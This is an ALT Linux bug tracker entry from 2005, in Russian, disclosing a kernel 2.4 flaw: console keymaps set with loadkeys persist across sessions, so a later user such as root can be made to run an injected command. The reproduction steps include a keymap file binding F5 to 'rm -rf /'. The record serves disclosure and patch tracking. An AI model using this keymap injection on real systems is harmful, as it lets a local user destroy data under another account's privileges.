Bug 8294 - Выполнение произвольной комманды из под другого пользователя путём изменения раскладки клавиатуры.
: Выполнение произвольной комманды из под другого пользователя путём изменения ...
Status: CLOSED FIXED
: ALT Linux 2.4
(All bugs in ALT Linux 2.4/kernel-image-std-up)
: 2.4
: all Linux
: P1 blocker
Assigned To:
:
: http://www.securitylab.ru/vulnerabili...
:
:
:
  Show dependency tree
 
Reported: 2005-10-19 16:33 by
Modified: 2005-11-18 02:54 (History)


Attachments


Note

You need to log in before you can comment on or make changes to this bug.


Description From 2005-10-19 16:33:27
Уязвимость существует при обработке консольной раскладки клавиатуры. Раскладка,
установленная локальным пользователем с помощью loadkeys, устанавливается на
все
виртуальные консоли и не восстанавливает значение по умолчанию после завершения
сеанса пользователя. Злоумышленник может внедрить произвольные команды в
определенную раскладку клавиатуры и выполнить их, когда целевой пользователь во
время следующего сеанса, воспользуется клавишами для переключения раскладок
Steps to Reproduce:
1. создаём файл key.txt с содержимым:
keycode 63 = F70 F71
string F70 = "rm -rf / \n"
string F71 = "Goodbye!"

2. $ loadkeys key.txt
3. выходим и заходим на соседней консоли под root
нажимаем F5
4. идём в серверную и вешаемся на витой паре
Actual Results:  
возможно привязать любую комманду к любой клавише на клавиатуре. Комманда будет
выполнена из под пользователя, зашедшего после  этого в консоль
------- Comment #1 From 2005-10-31 12:12:36 -------
Дополнительная информация по уязвимости:
http://www.kernel.org/git/?p=linux/kernel/git/marcelo/linux-2.4.git;a=commitdiff;h=2afb6d8ea04e81a1547e8e51b7550a8fd69b9fce
есть патч для ядра 2.4.31
исправлено в 2.6.14

http://www.linux.org.ru/jump-message.jsp?msgid=1137045&lastmod=1130746363771
------- Comment #2 From 2005-10-31 16:57:37 -------
так ведь?
------- Comment #3 From 2005-11-05 17:43:22 -------
По моему эту ошибку решили проигнорировать:(
------- Comment #4 From 2005-11-05 18:10:55 -------
Сергей, с тебя ответ.
------- Comment #5 From 2005-11-18 02:54:26 -------
Fixed by vsu@ few days ago in
kernel-image-std-smp-2.4.26-alt13
kernel-image-std-up-2.4.26-alt13
kernel-image-vs-smp-2.4.26-alt13.1